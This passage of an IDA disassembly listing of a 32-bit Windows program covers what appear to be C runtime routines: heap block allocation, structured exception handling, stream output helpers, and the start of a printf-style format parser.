jnz short loc_406383
add ebx, 14h
loc_40637C: ; CODE XREF: sub_4062F9+70�j
cmp ebx, ecx
mov [ebp+arg_0], ebx
jb short loc_40636B
loc_406383: ; CODE XREF: sub_4062F9+7E�j
cmp ebx, ecx
jnz short loc_4063E2
jmp short loc_406395
; ---------------------------------------------------------------------------
loc_406389: ; CODE XREF: sub_4062F9+9E�j
cmp dword ptr [ebx+8], 0
jnz short loc_406399
add ebx, 14h
mov [ebp+arg_0], ebx
loc_406395: ; CODE XREF: sub_4062F9+8E�j
cmp ebx, eax
jb short loc_406389
loc_406399: ; CODE XREF: sub_4062F9+94�j
cmp ebx, eax
jnz short loc_4063CE
mov ebx, ds:dword_434DE0
jmp short loc_4063AE
; ---------------------------------------------------------------------------
loc_4063A5: ; CODE XREF: sub_4062F9+BA�j
cmp dword ptr [ebx+8], 0
jnz short loc_4063B5
add ebx, 14h
loc_4063AE: ; CODE XREF: sub_4062F9+AA�j
cmp ebx, ecx
mov [ebp+arg_0], ebx
jb short loc_4063A5
loc_4063B5: ; CODE XREF: sub_4062F9+B0�j
cmp ebx, ecx
jnz short loc_4063CE
call sub_405E64
mov ebx, eax
test ebx, ebx
mov [ebp+arg_0], ebx
jnz short loc_4063CE
loc_4063C7: ; CODE XREF: sub_4062F9+E7�j
xor eax, eax
jmp loc_4065D7
; ---------------------------------------------------------------------------
loc_4063CE: ; CODE XREF: sub_4062F9+A2�j
; sub_4062F9+BE�j ...
push ebx
call sub_405F14
pop ecx
mov ecx, [ebx+10h]
mov [ecx], eax
mov eax, [ebx+10h]
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_4063C7
loc_4063E2: ; CODE XREF: sub_4062F9+68�j
; sub_4062F9+8C�j
mov ds:dword_434DE8, ebx
mov eax, [ebx+10h]
mov edx, [eax]
cmp edx, 0FFFFFFFFh
mov [ebp+var_4], edx
jz short loc_406409
mov ecx, [eax+edx*4+0C4h]
mov edi, [eax+edx*4+44h]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_406432
loc_406409: ; CODE XREF: sub_4062F9+FA�j
and [ebp+var_4], 0
mov edx, [eax+0C4h]
lea ecx, [eax+44h]
loc_406416: ; CODE XREF: sub_4062F9+134�j
mov edi, [ecx]
and edx, [ebp+var_8]
and edi, esi
or edx, edi
jnz short loc_40642F
inc [ebp+var_4]
mov edx, [ecx+84h]
add ecx, 4
jmp short loc_406416
; ---------------------------------------------------------------------------
loc_40642F: ; CODE XREF: sub_4062F9+126�j
mov edx, [ebp+var_4]
loc_406432: ; CODE XREF: sub_4062F9+10E�j
mov ecx, edx
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [eax+edx*4+44h]
xor edi, edi
and ecx, esi
jnz short loc_406460
mov ecx, [eax+edx*4+0C4h]
and ecx, [ebp+var_8]
push 20h
pop edi
jmp short loc_406460
; ---------------------------------------------------------------------------
loc_40645D: ; CODE XREF: sub_4062F9+169�j
add ecx, ecx
inc edi
loc_406460: ; CODE XREF: sub_4062F9+153�j
; sub_4062F9+162�j
test ecx, ecx
jge short loc_40645D
mov ecx, [ebp+var_C]
mov edx, [ecx+edi*8+4]
mov ecx, [edx]
sub ecx, [ebp+var_10]
mov esi, ecx
sar esi, 4
dec esi
cmp esi, 3Fh
mov [ebp+var_8], ecx
jle short loc_406481
push 3Fh
pop esi
loc_406481: ; CODE XREF: sub_4062F9+183�j
cmp esi, edi
jz loc_40658A
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_4064ED
cmp edi, 20h
mov ebx, 80000000h
jge short loc_4064C1
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
not ebx
mov [ebp+var_14], ebx
and ebx, [eax+ecx*4+44h]
mov [eax+ecx*4+44h], ebx
dec byte ptr [edi]
jnz short loc_4064EA
mov ecx, [ebp+var_14]
mov ebx, [ebp+arg_0]
and [ebx], ecx
jmp short loc_4064ED
; ---------------------------------------------------------------------------
loc_4064C1: ; CODE XREF: sub_4062F9+1A0�j
lea ecx, [edi-20h]
shr ebx, cl
mov ecx, [ebp+var_4]
lea ecx, [eax+ecx*4+0C4h]
lea edi, [eax+edi+4]
not ebx
and [ecx], ebx
dec byte ptr [edi]
mov [ebp+var_14], ebx
jnz short loc_4064EA
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx+4], ecx
jmp short loc_4064ED
; ---------------------------------------------------------------------------
loc_4064EA: ; CODE XREF: sub_4062F9+1BC�j
; sub_4062F9+1E4�j
mov ebx, [ebp+arg_0]
loc_4064ED: ; CODE XREF: sub_4062F9+196�j
; sub_4062F9+1C6�j ...
cmp [ebp+var_8], 0
mov ecx, [edx+8]
mov edi, [edx+4]
mov [ecx+4], edi
mov ecx, [edx+4]
mov edi, [edx+8]
mov [ecx+8], edi
jz loc_406596
mov ecx, [ebp+var_C]
lea ecx, [ecx+esi*8]
mov edi, [ecx+4]
mov [edx+8], ecx
mov [edx+4], edi
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_406587
mov cl, [esi+eax+4]
mov byte ptr [ebp+arg_0+3], cl
inc cl
cmp esi, 20h
mov [esi+eax+4], cl
jge short loc_40655E
cmp byte ptr [ebp+arg_0+3], 0
jnz short loc_40654C
mov edi, 80000000h
mov ecx, esi
shr edi, cl
or [ebx], edi
loc_40654C: ; CODE XREF: sub_4062F9+246�j
mov ecx, esi
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+var_4]
or [eax+ecx*4+44h], edi
jmp short loc_406587
; ---------------------------------------------------------------------------
loc_40655E: ; CODE XREF: sub_4062F9+240�j
cmp byte ptr [ebp+arg_0+3], 0
jnz short loc_406571
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
or [ebx+4], edi
loc_406571: ; CODE XREF: sub_4062F9+269�j
mov ecx, [ebp+var_4]
lea edi, [eax+ecx*4+0C4h]
lea ecx, [esi-20h]
mov esi, 80000000h
shr esi, cl
or [edi], esi
loc_406587: ; CODE XREF: sub_4062F9+22E�j
; sub_4062F9+263�j
mov ecx, [ebp+var_8]
loc_40658A: ; CODE XREF: sub_4062F9+18A�j
test ecx, ecx
jz short loc_406599
mov [edx], ecx
mov [ecx+edx-4], ecx
jmp short loc_406599
; ---------------------------------------------------------------------------
loc_406596: ; CODE XREF: sub_4062F9+20A�j
mov ecx, [ebp+var_8]
loc_406599: ; CODE XREF: sub_4062F9+293�j
; sub_4062F9+29B�j
mov esi, [ebp+var_10]
add edx, ecx
lea ecx, [esi+1]
mov [edx], ecx
mov [edx+esi-4], ecx
mov esi, [ebp+var_C]
mov ecx, [esi]
test ecx, ecx
lea edi, [ecx+1]
mov [esi], edi
jnz short loc_4065CF
cmp ebx, ds:dword_425F6C
jnz short loc_4065CF
mov ecx, [ebp+var_4]
cmp ecx, ds:dword_434DF0
jnz short loc_4065CF
and ds:dword_425F6C, 0
loc_4065CF: ; CODE XREF: sub_4062F9+2BA�j
; sub_4062F9+2C2�j ...
mov ecx, [ebp+var_4]
mov [eax], ecx
lea eax, [edx+4]
loc_4065D7: ; CODE XREF: sub_4062F9+D0�j
pop edi
pop esi
pop ebx
leave
retn
sub_4062F9 endp
; [00000045 BYTES: COLLAPSED FUNCTION __SEH_prolog4. PRESS KEYPAD "+" TO EXPAND]
; [00000014 BYTES: COLLAPSED FUNCTION __SEH_epilog4. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
sub_406640 proc near ; DATA XREF: __SEH_prolog4�o
var_11 = byte ptr -11h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
; FUNCTION CHUNK AT 004086D1 SIZE 00000019 BYTES
sub esp, 14h
push ebx
mov ebx, [esp+18h+arg_4]
push ebp
push esi
mov esi, [ebx+8]
xor esi, ds:dword_423064
push edi
mov eax, [esi]
cmp eax, 0FFFFFFFEh
mov [esp+24h+var_11], 0
mov [esp+24h+var_C], 1
lea edi, [ebx+10h]
jz short loc_406678
mov ecx, [esi+4]
add ecx, edi
xor ecx, [eax+edi]
call sub_402710
loc_406678: ; CODE XREF: sub_406640+29�j
mov ecx, [esi+0Ch]
mov eax, [esi+8]
add ecx, edi
xor ecx, [eax+edi]
call sub_402710
mov eax, [esp+24h+arg_0]
test byte ptr [eax+4], 66h
jnz loc_4067B5
mov ebp, [ebx+0Ch]
cmp ebp, 0FFFFFFFEh
mov ecx, [esp+24h+arg_8]
lea edx, [esp+24h+var_8]
mov [esp+24h+var_8], eax
mov [esp+24h+var_4], ecx
mov [ebx-4], edx
jz short loc_40670F
loc_4066B1: ; CODE XREF: sub_406640+A2�j
lea eax, [ebp+ebp*2+0]
mov ecx, [esi+eax*4+14h]
test ecx, ecx
lea ebx, [esi+eax*4+10h]
mov eax, [ebx]
mov [esp+24h+var_10], eax
jz short loc_4066DD
mov edx, edi
call sub_4086BA
test eax, eax
mov [esp+24h+var_11], 1
jl short loc_40671B
jg short loc_406725
mov eax, [esp+24h+var_10]
loc_4066DD: ; CODE XREF: sub_406640+85�j
cmp eax, 0FFFFFFFEh
mov ebp, eax
jnz short loc_4066B1
cmp [esp+24h+var_11], 0
jz short loc_40670F
loc_4066EB: ; CODE XREF: sub_406640+E3�j
; sub_406640+191�j
mov eax, [esi]
cmp eax, 0FFFFFFFEh
jz short loc_4066FF
mov ecx, [esi+4]
add ecx, edi
xor ecx, [eax+edi]
call sub_402710
loc_4066FF: ; CODE XREF: sub_406640+B0�j
mov ecx, [esi+0Ch]
mov eax, [esi+8]
add ecx, edi
xor ecx, [eax+edi]
call sub_402710
loc_40670F: ; CODE XREF: sub_406640+6F�j
; sub_406640+A9�j ...
mov eax, [esp+24h+var_C]
pop edi
pop esi
pop ebp
pop ebx
add esp, 14h
retn
; ---------------------------------------------------------------------------
loc_40671B: ; CODE XREF: sub_406640+95�j
mov [esp+24h+var_C], 0
jmp short loc_4066EB
; ---------------------------------------------------------------------------
loc_406725: ; CODE XREF: sub_406640+97�j
mov ecx, [esp+24h+arg_0]
cmp dword ptr [ecx], 0E06D7363h
jnz short loc_40675B
cmp ds:off_41DC1C, 0
jz short loc_40675B
push offset off_41DC1C
call sub_40CC52
add esp, 4
test eax, eax
jz short loc_40675B
mov edx, [esp+24h+arg_0]
push 1
push edx
call ds:off_41DC1C
add esp, 8
loc_40675B: ; CODE XREF: sub_406640+EF�j
; sub_406640+F8�j ...
mov ecx, [esp+24h+arg_4]
call sub_4086EA
mov eax, [esp+24h+arg_4]
cmp [eax+0Ch], ebp
jz short loc_406780
push offset dword_423064
push edi
mov edx, ebp
mov ecx, eax
call sub_408704
mov eax, [esp+24h+arg_4]
loc_406780: ; CODE XREF: sub_406640+12B�j
mov ecx, [esp+24h+var_10]
mov [eax+0Ch], ecx
mov eax, [esi]
cmp eax, 0FFFFFFFEh
jz short loc_40679B
mov ecx, [esi+4]
add ecx, edi
xor ecx, [eax+edi]
call sub_402710
loc_40679B: ; CODE XREF: sub_406640+14C�j
mov ecx, [esi+0Ch]
mov edx, [esi+8]
add ecx, edi
xor ecx, [edx+edi]
call sub_402710
mov ecx, [ebx+8]
mov edx, edi
jmp loc_4086D1
; ---------------------------------------------------------------------------
loc_4067B5: ; CODE XREF: sub_406640+50�j
cmp dword ptr [ebx+0Ch], 0FFFFFFFEh
jz loc_40670F
push offset dword_423064
push edi
mov ecx, ebx
mov edx, 0FFFFFFFEh
call sub_408704
jmp loc_4066EB
sub_406640 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4067D6 proc near ; CODE XREF: sub_402AEE+9F�p
; sub_4030B5+6E�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
mov esi, [ebp+arg_4]
push esi
call sub_408A20
mov [ebp+arg_4], eax
mov eax, [esi+0Ch]
test al, 82h
pop ecx
jnz short loc_406806
call sub_4057D3
mov dword ptr [eax], 9
loc_4067FA: ; CODE XREF: sub_4067D6+3F�j
or dword ptr [esi+0Ch], 20h
or eax, 0FFFFFFFFh
jmp loc_406933
; ---------------------------------------------------------------------------
loc_406806: ; CODE XREF: sub_4067D6+17�j
test al, 40h
jz short loc_406817
call sub_4057D3
mov dword ptr [eax], 22h
jmp short loc_4067FA
; ---------------------------------------------------------------------------
loc_406817: ; CODE XREF: sub_4067D6+32�j
push ebx
xor ebx, ebx
test al, 1
jz short loc_406834
test al, 10h
mov [esi+4], ebx
jz loc_4068AE
mov ecx, [esi+8]
and eax, 0FFFFFFFEh
mov [esi], ecx
mov [esi+0Ch], eax
loc_406834: ; CODE XREF: sub_4067D6+46�j
mov eax, [esi+0Ch]
and eax, 0FFFFFFEFh
or eax, 2
test ax, 10Ch
mov [esi+0Ch], eax
mov [esi+4], ebx
mov [ebp+var_4], ebx
jnz short loc_406878
call sub_408084
add eax, 20h
cmp esi, eax
jz short loc_406864
call sub_408084
add eax, 40h
cmp esi, eax
jnz short loc_406871
loc_406864: ; CODE XREF: sub_4067D6+80�j
push [ebp+arg_4]
call sub_40D540
test eax, eax
pop ecx
jnz short loc_406878
loc_406871: ; CODE XREF: sub_4067D6+8C�j
push esi
call sub_40D4FC
pop ecx
loc_406878: ; CODE XREF: sub_4067D6+74�j
; sub_4067D6+99�j
test word ptr [esi+0Ch], 108h
push edi
jz loc_406905
mov eax, [esi+8]
mov edi, [esi]
lea ecx, [eax+1]
mov [esi], ecx
mov ecx, [esi+18h]
sub edi, eax
dec ecx
cmp edi, ebx
mov [esi+4], ecx
jle short loc_4068B9
push edi
push eax
push [ebp+arg_4]
call sub_40D420
add esp, 0Ch
mov [ebp+var_4], eax
jmp short loc_4068FB
; ---------------------------------------------------------------------------
loc_4068AE: ; CODE XREF: sub_4067D6+4D�j
or eax, 20h
mov [esi+0Ch], eax
or eax, 0FFFFFFFFh
jmp short loc_406932
; ---------------------------------------------------------------------------
loc_4068B9: ; CODE XREF: sub_4067D6+C4�j
mov ecx, [ebp+arg_4]
cmp ecx, 0FFFFFFFFh
jz short loc_4068DC
cmp ecx, 0FFFFFFFEh
jz short loc_4068DC
mov eax, ecx
and eax, 1Fh
imul eax, 28h
mov edx, ecx
sar edx, 5
add eax, ds:dword_433CA0[edx*4]
jmp short loc_4068E1
; ---------------------------------------------------------------------------
loc_4068DC: ; CODE XREF: sub_4067D6+E9�j
; sub_4067D6+EE�j
mov eax, offset dword_423BD0
loc_4068E1: ; CODE XREF: sub_4067D6+104�j
test byte ptr [eax+4], 20h
jz short loc_4068FB
push 2
push ebx
push ebx
push ecx
call sub_40CD41
and eax, edx
add esp, 10h
cmp eax, 0FFFFFFFFh
jz short loc_406920
loc_4068FB: ; CODE XREF: sub_4067D6+D6�j
; sub_4067D6+10F�j
mov eax, [esi+8]
mov cl, byte ptr [ebp+arg_0]
mov [eax], cl
jmp short loc_40691B
; ---------------------------------------------------------------------------
loc_406905: ; CODE XREF: sub_4067D6+A9�j
xor edi, edi
inc edi
push edi
lea eax, [ebp+arg_0]
push eax
push [ebp+arg_4]
call sub_40D420
add esp, 0Ch
mov [ebp+var_4], eax
loc_40691B: ; CODE XREF: sub_4067D6+12D�j
cmp [ebp+var_4], edi
jz short loc_406929
loc_406920: ; CODE XREF: sub_4067D6+123�j
or dword ptr [esi+0Ch], 20h
or eax, 0FFFFFFFFh
jmp short loc_406931
; ---------------------------------------------------------------------------
loc_406929: ; CODE XREF: sub_4067D6+148�j
mov eax, [ebp+arg_0]
and eax, 0FFh
loc_406931: ; CODE XREF: sub_4067D6+151�j
pop edi
loc_406932: ; CODE XREF: sub_4067D6+E1�j
pop ebx
loc_406933: ; CODE XREF: sub_4067D6+2B�j
pop esi
leave
retn
sub_4067D6 endp
; =============== S U B R O U T I N E =======================================
sub_406936 proc near ; CODE XREF: sub_406969+11�p
; sub_40698D+22�p ...
test byte ptr [ecx+0Ch], 40h
jz short loc_406942
cmp dword ptr [ecx+8], 0
jz short loc_406966
loc_406942: ; CODE XREF: sub_406936+4�j
dec dword ptr [ecx+4]
js short loc_406952
mov edx, [ecx]
mov [edx], al
inc dword ptr [ecx]
movzx eax, al
jmp short loc_40695E
; ---------------------------------------------------------------------------
loc_406952: ; CODE XREF: sub_406936+F�j
movsx eax, al
push ecx
push eax
call sub_4067D6
pop ecx
pop ecx
loc_40695E: ; CODE XREF: sub_406936+1A�j
cmp eax, 0FFFFFFFFh
jnz short loc_406966
or [esi], eax
retn
; ---------------------------------------------------------------------------
loc_406966: ; CODE XREF: sub_406936+A�j
; sub_406936+2B�j
inc dword ptr [esi]
retn
sub_406936 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406969 proc near ; CODE XREF: sub_4069D7+853�p
; sub_4069D7+880�p ...
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
mov esi, eax
jmp short loc_406984
; ---------------------------------------------------------------------------
loc_406971: ; CODE XREF: sub_406969+1F�j
mov ecx, [ebp+arg_8]
mov al, [ebp+arg_0]
dec [ebp+arg_4]
call sub_406936
cmp dword ptr [esi], 0FFFFFFFFh
jz short loc_40698A
loc_406984: ; CODE XREF: sub_406969+6�j
cmp [ebp+arg_4], 0
jg short loc_406971
loc_40698A: ; CODE XREF: sub_406969+19�j
pop esi
pop ebp
retn
sub_406969 endp
; =============== S U B R O U T I N E =======================================
sub_40698D proc near ; CODE XREF: sub_4069D7+867�p
; sub_4069D7+8CE�p ...
arg_0 = dword ptr 4
test byte ptr [edi+0Ch], 40h
push ebx
push esi
mov esi, eax
mov ebx, ecx
jz short loc_4069CD
cmp dword ptr [edi+8], 0
jnz short loc_4069CD
mov eax, [esp+8+arg_0]
add [esi], eax
jmp short loc_4069D4
; ---------------------------------------------------------------------------
loc_4069A7: ; CODE XREF: sub_40698D+45�j
mov al, [ebx]
dec [esp+8+arg_0]
mov ecx, edi
call sub_406936
inc ebx
cmp dword ptr [esi], 0FFFFFFFFh
jnz short loc_4069CD
call sub_4057D3
cmp dword ptr [eax], 2Ah
jnz short loc_4069D4
mov ecx, edi
mov al, 3Fh
call sub_406936
loc_4069CD: ; CODE XREF: sub_40698D+A�j
; sub_40698D+10�j ...
cmp [esp+8+arg_0], 0
jg short loc_4069A7
loc_4069D4: ; CODE XREF: sub_40698D+18�j
; sub_40698D+35�j
pop esi
pop ebx
retn
sub_40698D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=1F8h
sub_4069D7 proc near ; CODE XREF: sub_402AEE+80�p
; sub_4030B5+53�p ...
var_278 = dword ptr -278h
var_274 = dword ptr -274h
var_270 = dword ptr -270h
var_26C = dword ptr -26Ch
var_268 = dword ptr -268h
var_260 = dword ptr -260h
var_25C = byte ptr -25Ch
var_254 = dword ptr -254h
var_250 = byte ptr -250h
var_24C = dword ptr -24Ch
var_248 = dword ptr -248h
var_244 = dword ptr -244h
var_240 = dword ptr -240h
var_23C = dword ptr -23Ch
var_238 = dword ptr -238h
var_234 = dword ptr -234h
var_230 = byte ptr -230h
var_22F = byte ptr -22Fh
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_211 = byte ptr -211h
var_210 = dword ptr -210h
var_20C = byte ptr -20Ch
var_D = byte ptr -0Dh
var_C = byte ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
lea ebp, [esp-1F8h]
sub esp, 278h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+1F8h+var_4], eax
mov eax, [ebp+1F8h+arg_0]
push ebx
mov ebx, [ebp+1F8h+arg_4]
push esi
xor esi, esi
push edi
mov edi, [ebp+1F8h+arg_C]
push [ebp+1F8h+arg_8]
lea ecx, [ebp+1F8h+var_25C]
mov [ebp+1F8h+var_228], eax
mov [ebp+1F8h+var_224], edi
mov [ebp+1F8h+var_244], esi
mov [ebp+1F8h+var_210], esi
mov [ebp+1F8h+var_238], esi
mov [ebp+1F8h+var_218], esi
mov [ebp+1F8h+var_234], esi
mov [ebp+1F8h+var_248], esi
mov [ebp+1F8h+var_23C], esi
call sub_40271F
cmp [ebp+1F8h+var_228], esi
jnz short loc_406A64
loc_406A37: ; CODE XREF: sub_4069D7+E5�j
; sub_4069D7+138�j ...
call sub_4057D3
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
push esi
loc_406A47: ; CODE XREF: sub_4069D7+948�j
call sub_402F39
add esp, 14h
cmp [ebp+1F8h+var_250], 0
jz short loc_406A5C
mov eax, [ebp+1F8h+var_254]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_406A5C: ; CODE XREF: sub_4069D7+7C�j
or eax, 0FFFFFFFFh
jmp loc_407334
; ---------------------------------------------------------------------------
loc_406A64: ; CODE XREF: sub_4069D7+5E�j
mov eax, [ebp+1F8h+var_228]
test byte ptr [eax+0Ch], 40h
jnz loc_406B15
push eax
call sub_408A20
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_406AB3
push [ebp+1F8h+var_228]
call sub_408A20
cmp eax, 0FFFFFFFEh
pop ecx
jz short loc_406AB3
push [ebp+1F8h+var_228]
call sub_408A20
push [ebp+1F8h+var_228]
sar eax, 5
lea esi, ds:433CA0h[eax*4]
call sub_408A20
and eax, 1Fh
imul eax, 28h
add eax, [esi]
pop ecx
pop ecx
xor esi, esi
jmp short loc_406AB8
; ---------------------------------------------------------------------------
loc_406AB3: ; CODE XREF: sub_4069D7+A4�j
; sub_4069D7+B2�j
mov eax, offset dword_423BD0
loc_406AB8: ; CODE XREF: sub_4069D7+DA�j
test byte ptr [eax+24h], 7Fh
jnz loc_406A37
push [ebp+1F8h+var_228]
call sub_408A20
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_406B06
push [ebp+1F8h+var_228]
call sub_408A20
cmp eax, 0FFFFFFFEh
pop ecx
jz short loc_406B06
push [ebp+1F8h+var_228]
call sub_408A20
push [ebp+1F8h+var_228]
sar eax, 5
lea esi, ds:433CA0h[eax*4]
call sub_408A20
and eax, 1Fh
imul eax, 28h
add eax, [esi]
pop ecx
pop ecx
xor esi, esi
jmp short loc_406B0B
; ---------------------------------------------------------------------------
loc_406B06: ; CODE XREF: sub_4069D7+F7�j
; sub_4069D7+105�j
mov eax, offset dword_423BD0
loc_406B0B: ; CODE XREF: sub_4069D7+12D�j
test byte ptr [eax+24h], 80h
jnz loc_406A37
loc_406B15: ; CODE XREF: sub_4069D7+94�j
cmp ebx, esi
jz loc_406A37
mov dl, [ebx]
xor ecx, ecx
test dl, dl
mov [ebp+1F8h+var_22C], esi
mov [ebp+1F8h+var_220], esi
mov [ebp+1F8h+var_24C], esi
mov [ebp+1F8h+var_211], dl
jz loc_407324
loc_406B35: ; CODE XREF: sub_4069D7+931�j
inc ebx
cmp [ebp+1F8h+var_22C], 0
mov [ebp+1F8h+var_240], ebx
jl loc_407324
mov al, dl
sub al, 20h
cmp al, 58h
ja short loc_406B5C
movsx eax, dl
movzx eax, ds:byte_41D4D8[eax]
and eax, 0Fh
xor esi, esi
jmp short loc_406B60
; ---------------------------------------------------------------------------
loc_406B5C: ; CODE XREF: sub_4069D7+172�j
xor esi, esi
xor eax, eax
loc_406B60: ; CODE XREF: sub_4069D7+183�j
movsx eax, ds:byte_41D4F8[ecx+eax*8]
push 7
sar eax, 4
pop ecx
cmp eax, ecx ; switch 8 cases
mov [ebp+1F8h+var_26C], eax
ja loc_4072F4 ; default
jmp off_40734F[eax*4] ; switch jump
loc_406B80: ; DATA XREF: J8@F_7_S:off_40734F�o
or [ebp+1F8h+var_218], 0FFFFFFFFh ; jumptable 00406B79 case 1
mov [ebp+1F8h+var_270], esi
mov [ebp+1F8h+var_248], esi
mov [ebp+1F8h+var_238], esi
mov [ebp+1F8h+var_234], esi
mov [ebp+1F8h+var_210], esi
mov [ebp+1F8h+var_23C], esi
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406B9B: ; CODE XREF: sub_4069D7+1A2�j
; DATA XREF: J8@F_7_S:off_40734F�o
movsx eax, dl ; jumptable 00406B79 case 2
sub eax, 20h
jz short loc_406BE1
sub eax, 3
jz short loc_406BD5
sub eax, 8
jz short loc_406BCC
dec eax
dec eax
jz short loc_406BC3
sub eax, 3
jnz loc_4072F4 ; default
or [ebp+1F8h+var_210], 8
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406BC3: ; CODE XREF: sub_4069D7+1D8�j
or [ebp+1F8h+var_210], 4
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406BCC: ; CODE XREF: sub_4069D7+1D4�j
or [ebp+1F8h+var_210], 1
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406BD5: ; CODE XREF: sub_4069D7+1CF�j
or [ebp+1F8h+var_210], 80h
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406BE1: ; CODE XREF: sub_4069D7+1CA�j
or [ebp+1F8h+var_210], 2
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406BEA: ; CODE XREF: sub_4069D7+1A2�j
; DATA XREF: J8@F_7_S:off_40734F�o
cmp dl, 2Ah ; jumptable 00406B79 case 3
jnz short loc_406C0F
add edi, 4
mov [ebp+1F8h+var_224], edi
mov edi, [edi-4]
cmp edi, esi
mov [ebp+1F8h+var_238], edi
jge loc_4072F4 ; default
or [ebp+1F8h+var_210], 4
neg [ebp+1F8h+var_238]
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406C0F: ; CODE XREF: sub_4069D7+216�j
mov eax, [ebp+1F8h+var_238]
imul eax, 0Ah
movsx ecx, dl
lea eax, [eax+ecx-30h]
mov [ebp+1F8h+var_238], eax
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406C24: ; CODE XREF: sub_4069D7+1A2�j
; DATA XREF: J8@F_7_S:off_40734F�o
mov [ebp+1F8h+var_218], esi ; jumptable 00406B79 case 4
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406C2C: ; CODE XREF: sub_4069D7+1A2�j
; DATA XREF: J8@F_7_S:off_40734F�o
cmp dl, 2Ah ; jumptable 00406B79 case 5
jnz short loc_406C4E
add edi, 4
mov [ebp+1F8h+var_224], edi
mov edi, [edi-4]
cmp edi, esi
mov [ebp+1F8h+var_218], edi
jge loc_4072F4 ; default
or [ebp+1F8h+var_218], 0FFFFFFFFh
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406C4E: ; CODE XREF: sub_4069D7+258�j
mov eax, [ebp+1F8h+var_218]
imul eax, 0Ah
movsx ecx, dl
lea eax, [eax+ecx-30h]
mov [ebp+1F8h+var_218], eax
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406C63: ; CODE XREF: sub_4069D7+1A2�j
; DATA XREF: J8@F_7_S:off_40734F�o
cmp dl, 49h ; jumptable 00406B79 case 6
jz short loc_406CAE
cmp dl, 68h
jz short loc_406CA5
cmp dl, 6Ch
jz short loc_406C87
cmp dl, 77h
jnz loc_4072F4 ; default
or [ebp+1F8h+var_210], 800h
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406C87: ; CODE XREF: sub_4069D7+299�j
cmp byte ptr [ebx], 6Ch
jnz short loc_406C9C
inc ebx
or [ebp+1F8h+var_210], 1000h
mov [ebp+1F8h+var_240], ebx
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406C9C: ; CODE XREF: sub_4069D7+2B3�j
or [ebp+1F8h+var_210], 10h
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406CA5: ; CODE XREF: sub_4069D7+294�j
or [ebp+1F8h+var_210], 20h
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406CAE: ; CODE XREF: sub_4069D7+28F�j
mov al, [ebx]
cmp al, 36h
jnz short loc_406CCB
cmp byte ptr [ebx+1], 34h
jnz short loc_406CCB
inc ebx
inc ebx
or [ebp+1F8h+var_210], 8000h
mov [ebp+1F8h+var_240], ebx
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406CCB: ; CODE XREF: sub_4069D7+2DB�j
; sub_4069D7+2E1�j
cmp al, 33h
jnz short loc_406CE6
cmp byte ptr [ebx+1], 32h
jnz short loc_406CE6
inc ebx
inc ebx
and [ebp+1F8h+var_210], 0FFFF7FFFh
mov [ebp+1F8h+var_240], ebx
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406CE6: ; CODE XREF: sub_4069D7+2F6�j
; sub_4069D7+2FC�j
cmp al, 64h
jz loc_4072F4 ; default
cmp al, 69h
jz loc_4072F4 ; default
cmp al, 6Fh
jz loc_4072F4 ; default
cmp al, 75h
jz loc_4072F4 ; default
cmp al, 78h
jz loc_4072F4 ; default
cmp al, 58h
jz loc_4072F4 ; default
mov [ebp+1F8h+var_26C], esi
loc_406D19: ; CODE XREF: sub_4069D7+1A2�j
; DATA XREF: J8@F_7_S:off_40734F�o
lea eax, [ebp+1F8h+var_25C] ; jumptable 00406B79 case 0
push eax
movzx eax, dl
push eax
mov [ebp+1F8h+var_23C], esi
call sub_40CA00
pop ecx
test eax, eax
mov al, [ebp+1F8h+var_211]
pop ecx
jz short loc_406D4B
mov ecx, [ebp+1F8h+var_228]
